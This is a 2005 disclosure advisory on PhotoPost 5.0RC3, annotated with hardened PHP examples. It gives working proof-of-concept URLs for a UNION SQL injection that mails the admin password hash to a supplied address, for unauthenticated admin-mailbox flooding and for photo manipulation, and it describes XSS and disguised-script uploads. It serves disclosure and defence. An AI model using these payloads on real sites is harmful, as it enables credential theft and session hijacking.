PhotoPost 5.0RC3, All Enthusiast, Inc, multiple vulnerabilities
March 05 2005

For your consideration.

1. BACKGROUND

PhotoPost is a popular commercial image publishing software. The vendor describes it like this:

=------
Everyone loves showing off their photos! Add PhotoPost to your site, or let us install it for you, and your visitors will be able to upload their photos to galleries on your site and interact in photo discussions. Join the 3,500+ sites that are already using PhotoPost and add a fun new dimension to your website.
=------

.... Yeah, it is just that bad.

2. IMPACT

A series of vulnerabilities allows a remote attacker
- to get arbitrary data from the PhotoPost tables (*)
- to spam the administrator's mailbox
- to steal sessions
- to manipulate photographs
- to XSS PhotoPost
- to upload "image" files with arbitrary content

(*) only under some configurations; described in detail below

3. SEVERITY

HIGH

4. ANALYSIS

4.1 GETTING ARBITRARY DATA FROM PHOTOPOST TABLES

PhotoPost (PP from here on) filters its input on a highly risky principle: it relies on magic_quotes. From the PHP manual:

=------
magic_quotes_gpc boolean
Sets the magic_quotes state for GPC (Get/Post/Cookie) operations. When magic_quotes are on, all ' (single-quote), " (double quote), \ (backslash) and NUL's are escaped with a backslash automatically.
=------

A large share of PP installations never turn magic_quotes on. Data filtering is too essential to leave to the site operator; PP should escape every value itself, in central routines built on mysql_escape_string/mysql_real_escape_string (and a numeric cast for numeric parameters). A few lines of native code would have removed that "human" factor for good. Many operators have no idea what magic_quotes is, what it is for, or what their negligence leads to, even though PP warns about it during installation. Given the architecture PP is assembled upon, the installer should not even attempt to proceed on systems with magic_quotes turned off.
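The pattern just described, a request value dropped into SQL with nothing but magic_quotes_gpc between it and the parser, beside two hardened forms. This is an added example and not PhotoPost code; the query text mirrors the shape of PP's password-reminder lookup, but the function names, the `pp_` prefix and the mysqli usage are assumptions for illustration. The payload string is the one from the proof of concept below, URL-decoded.

```php
<?php
// Added example, not PhotoPost code. Function names and the table prefix are illustrative.

// The unsafe pattern: a GPC value is interpolated into SQL unquoted, so
// magic_quotes_gpc (which only escapes ' " \ and NUL) is the whole defence.
function rpwd_query_unsafe(string $prefix, string $uid): string
{
    return "SELECT joindate,email,username FROM {$prefix}users WHERE userid=$uid";
}

// Hardened, in the style available to 2005-era PHP: a numeric column gets a
// numeric value, so nothing but digits can reach the SQL parser. This works
// with or without magic_quotes, which is the point.
function rpwd_query_intval(string $prefix, string $uid): string
{
    $id = (int) $uid;            // '0 union select ...' casts to 0
    return "SELECT joindate,email,username FROM {$prefix}users WHERE userid=$id";
}

// Hardened, current PHP: a prepared statement. The value travels separately from
// the SQL text, so quoting is irrelevant. Identifiers (the table prefix) cannot be
// bound, so they are validated against an allow-list instead.
function rpwd_lookup(mysqli $db, string $prefix, string $uid): ?array
{
    if (!preg_match('/^[A-Za-z0-9_]{0,32}$/', $prefix)) {
        throw new InvalidArgumentException('bad table prefix');
    }
    $id   = (int) $uid;
    $stmt = $db->prepare("SELECT joindate,email,username FROM {$prefix}users WHERE userid=?");
    $stmt->bind_param('i', $id);
    $stmt->execute();
    $row = $stmt->get_result()->fetch_assoc();
    $stmt->close();
    return $row ?: null;
}

// The proof-of-concept payload from this advisory (URL-decoded). magic_quotes would
// only touch the double quotes in it; a variant written with MySQL hex literals
// (0x...) carries no quotes at all, which is why quoting is not a fix for a
// numeric parameter and the cast above is.
$payload = '0 union select "0","yourmail@host.zone",concat(username," ",password) from users';

echo rpwd_query_unsafe('pp_', $payload), "\n";
echo rpwd_query_intval('pp_', $payload), "\n";
```

Run under php-cli: the first line printed still contains the whole UNION, the second ends in `userid=0`. rpwd_lookup() needs a live mysqli connection (and mysqlnd for get_result()), so it is defined but not called in the stand-alone run.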
PROOF of CONCEPT

To see whether PP is running in an environment with magic quotes turned off, one might use the following URL (I):

http://photopost.hosting.site/photopost/member.php?ppaction=rpwd&verifykey=0&uid=0%20union%20select%20"0","yourmail@host.zone",%20concat(username,"%20",%20password)%20from%20users

no login required

* replace yourmail@host.zone with your own e-mail address. If magic quotes are turned off, you get the admin user name and MD5 password hash in your mailbox.

* this URL will not work if the site runs an old MySQL version:

=---
UNION is used to combine the result from many SELECT statements into one result set. UNION is available from MySQL 4.0.0 on .....
=---

UNION is the most direct way to exploit PHP-based queries, because mysql_query() sends a single statement and the PHP developers sensibly did not allow multiple queries divided by ';'.

QUICK FIX

.htaccess
php_value magic_quotes_gpc 1

4.2 CODING NEGLIGENCE

Analysis of query (I) leads straight to another security issue in PP. It has plenty of unsafe queries like

"SELECT joindate,email,username FROM {$Globals['pp_db_prefix']}users WHERE userid=$uid"

Note that the database column userid is compared with $uid. $uid is supplied by the user, so its content is arbitrary, and still there are no quotes, no is_numeric()/intval() check, nothing of the kind. Looking at the code at random shows that PP does check now and then, but the rule is not universal. Even with magic_quotes turned on it might be possible to devise a query that passes, one way or another, and gets data posted to your mailbox anyway: a numeric comparison needs no quotes, so escaping quotes does not help it. The example query (I) will not do that; it was constructed only to pass the several conditions that stand before 'send' is invoked.

QUICK FIX

1) .htaccess
php_value magic_quotes_gpc 1

It will at least make it more difficult.

4.3 SPAMMING THE ADMINISTRATOR MAILBOX WITH ARBITRARY CONTENT

PP does not always check whether the user is authorized.
Even where it does attempt a login, as in this particular case, it does not act on the result. The other problem is that PP keeps no count of how many events it has served (mail sending, say), how often, or how many authentication attempts were made. There is no policy at all; combined, this leads to spam.

PROOF of CONCEPT

http://photopost.hosting.site/photopost/misc.php?action=reportpost&report=1&final=1

no login required

Using this URL one may send the administrator an arbitrary number of mails, and PP will not even try to stop it.

QUICK FIX

Adding

if ($User['userid'] == "") {
    diewell( $Globals['pp_lang']['noreg'] );
}

right after authenticate() is invoked in the if($action = "reportpost") section should fix the problem with unauthorized users. It will not fix the problem in general: anyone who is authorized will still be able to spam the administrator, because nothing limits the rate.

4.4 MANIPULATING USER PHOTOGRAPHS

The problem is in adm-photo.php. Unlike all the other administrator scripts, it does not require "adm-inc.php", and adm-inc.php is where the built-in check lives that stops anybody except the administrator from going further. That omission opens the set of administrator functions built into adm-photo.php to everyone. As an example, I constructed a URL that rebuilds the thumbnails for the picture with a given PID (here, 1), namely rotates it:

PROOF of CONCEPT

http://photopost.hosting.site/photopost/adm-photo.php?ppaction=manipulate&pid=1&dowhat=rebuildthumb&dowhat=rotateccw

no login required

I'm not sure this is not one of the "features", but it looks like no one but the admin should be allowed to do this job.

QUICK FIX

I believe adding

require "adm-inc.php";

will solve the problem.

4.5 INSERTING ARBITRARY HTML CODE

XSS1

And finally, there is XSS in PP.
function check_tags($data, $allowed){
    // /e evaluates the replacement as PHP code for every tag (the modifier was removed in PHP 7.0)
    $data = preg_replace("/<(.*?)>/e", "process_tag(stripslashes('\\1'), \$allowed)", $data);
    // case-sensitive, literal match; misses JavaScript:, entity-encoded forms, embedded whitespace
    $data = str_replace('javascript:','#',$data);
    return $data;
}

I won't comment on it at length. "Checking" for javascript: with a literal, case-sensitive str_replace is a very, very bad habit: the browser accepts many spellings of the scheme that this rule does not. In short, it is possible to form the data so that PP accepts a given URL, and then the only "check" applied to it is this lame rule.

XSS2

PP does not filter the biography field 'editbio' in the user profile, so it can contain arbitrary HTML, tags and JavaScript; when the personal information is viewed, the viewer's session can be stolen.

QUICK FIX

None

4.6 UPLOADING IMAGES WITH ARBITRARY CONTENT

PP allows any file to be uploaded disguised as an image. It neither checks the file's content nor normalizes it to some internal standard. Basically one uploads JavaScript as an image into PP and then spreads a DIRECT link to the uploaded "image". IE will execute the JS from the broken image transparently.

PROOF OF CONCEPT

injected.gif

PP SHOULD load every uploaded file as a picture and then, on success, save the decoded picture, to guarantee that the file content is at least image/gif.

QUICK FIX

None

5. VENDOR STATUS

Informed a week ago by mail, with no response. Next time, if I have time to explore the sources again, I will not inform this particular vendor. When this article was posted in the private PP forum it was removed almost immediately. Today I got a letter (not a personal one) about a new 5.01 release. Looking at the fixed files, I saw that it really fixes some of the issues with PP described in this article. In particular, the e-mail bypass will not work in 5.01 under any condition.

I believe you may easily find the vulnerable versions, as well as some of the source code :-) with google.com

-- Best regards
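The two output-side checks that 4.5 and 4.6 above call for, in one added example that is not PhotoPost code: safe_href() replaces the str_replace('javascript:', '#', ...) idea with a decode-then-allow-list test on the URL scheme, and normalize_image() does what the text says PP should do, decode the upload as a picture and save the re-encoded result. Function names, the sample URLs, the 1x1 GIF and the two fake uploads are constructed for the example; it assumes PHP 8 with the GD extension.

```php
<?php
// Added example, not PhotoPost code. Assumes PHP 8 with the GD extension.

// 4.5: a literal, case-sensitive match for "javascript:" misses JaVaScRiPt:,
// java&#09;script:, javascript&#58; and &#106;avascript:. Decode entities first,
// strip the control characters browsers ignore inside a scheme, then allow only
// known schemes (or a scheme-less relative URL). Returns null to reject.
function safe_href(string $url): ?string
{
    $u = html_entity_decode($url, ENT_QUOTES | ENT_HTML5, 'UTF-8');
    $u = preg_replace('/[\x00-\x20]+/', '', $u);        // "java\tscript:" -> "javascript:"
    if (preg_match('/^([a-z][a-z0-9+.\-]*):/i', $u, $m)) {
        $scheme = strtolower($m[1]);
        if (!in_array($scheme, ['http', 'https', 'mailto'], true)) {
            return null;                                  // javascript:, data:, vbscript:, ...
        }
    }
    return htmlspecialchars($u, ENT_QUOTES, 'UTF-8');    // now safe inside href="..."
}

// The original rule, for comparison: true when the URL reaches the page unchanged.
function original_filter_passes(string $url): bool
{
    return str_replace('javascript:', '#', $url) === $url;
}

// 4.6: decode the upload as an image and re-encode it from pixels. Data that is not
// a decodable image (a script with a GIF header) is rejected, and bytes hidden after
// a real image's trailer do not survive, because only the pixels are written back.
function normalize_image(string $bytes): ?string
{
    $img = @imagecreatefromstring($bytes);    // false for anything GD cannot decode
    if ($img === false) {
        return null;
    }
    ob_start();
    imagegif($img);                           // always emit GIF, whatever was uploaded
    $out = ob_get_clean();
    imagedestroy($img);
    return $out;
}

// Constructed inputs for the demonstration.
$urls = [
    'http://example.com/photo.gif',
    '/photopost/showphoto.php?photo=1',
    'javascript:alert(1)',
    'JaVaScRiPt:alert(1)',
    "java\tscript:alert(1)",
    'javascript&#58;alert(1)',
    '&#106;avascript:alert(1)',
    'data:text/html,<script>alert(1)</script>',
];
foreach ($urls as $u) {
    printf("%-45s original: %-5s  hardened: %s\n",
        addcslashes($u, "\t"),
        original_filter_passes($u) ? 'pass' : 'block',
        safe_href($u) ?? 'block');
}

$realGif  = base64_decode('R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7'); // 1x1 GIF
$fakeGif  = "GIF89a<script>alert(1)</script>";        // starts like a GIF, is not one
$polyglot = $realGif . "<script>alert(1)</script>";  // real GIF with a payload appended

foreach (['real' => $realGif, 'fake' => $fakeGif, 'polyglot' => $polyglot] as $name => $data) {
    $clean = normalize_image($data);
    if ($clean === null) {
        printf("%-8s rejected\n", $name);
    } else {
        printf("%-8s accepted, %d bytes, script text survived: %s\n",
            $name, strlen($clean), str_contains($clean, '<script>') ? 'yes' : 'no');
    }
}
```

The first loop shows every javascript: variant except the lower-case literal getting past the original rule and none getting past safe_href(); the second shows the header-only fake rejected outright and the appended payload gone from the re-encoded output. Serve the stored file with the Content-Type of what was written (image/gif here) rather than the uploaded name's extension, and add X-Content-Type-Options: nosniff so browsers that honour it do not sniff the body at all.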